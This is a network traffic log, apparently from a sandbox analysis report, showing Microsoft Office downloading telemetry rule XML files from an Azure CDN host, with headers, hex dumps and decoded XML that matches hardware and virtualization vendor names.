                                                                                                                                                                                                2024-11-23 15:54:29 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                79192.168.2.44990913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:28 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155429Z-178bfbc474bpnd5vhC1NYC4vr400000004n000000000dgeu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                80192.168.2.44991213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:28 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155429Z-174c587ffdfmrvb9hC1TEBtn38000000035g000000008x5p
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:29 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                81192.168.2.44991313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:28 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                x-ms-request-id: 376cbe9f-601e-00ab-3b11-3d66f4000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155429Z-178bfbc474bbcwv4hC1NYCypys00000004n0000000001xp9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:29 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                82192.168.2.44991513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 432
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                x-ms-request-id: b3049c5e-001e-0082-330c-3d5880000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155431Z-178bfbc474bpscmfhC1NYCfc2c000000037g00000000crp9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:31 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                83192.168.2.44991413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                x-ms-request-id: e2ff131b-f01e-0085-7676-3b88ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155431Z-174c587ffdfcj798hC1TEB9bq4000000038000000000hq8m
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                84192.168.2.44991713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:31 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                x-ms-request-id: ba159eff-a01e-000d-0e45-3cd1ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155431Z-178bfbc474b9xljthC1NYCtw9400000004fg00000000kkgm
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                85192.168.2.44991813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155431Z-178bfbc474bgvl54hC1NYCsfuw00000004sg000000000vdy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                86192.168.2.44991613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                x-ms-request-id: 9a5c0c24-501e-0064-106e-3c1f54000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155431Z-174c587ffdftv9hphC1TEBm29w000000034g000000003f8x
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                87192.168.2.44991913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                x-ms-request-id: ec487560-c01e-0014-1389-3da6a3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155433Z-15b8b599d88wn9hhhC1TEBry0g000000038g000000004sdz
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                88192.168.2.44992113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 405
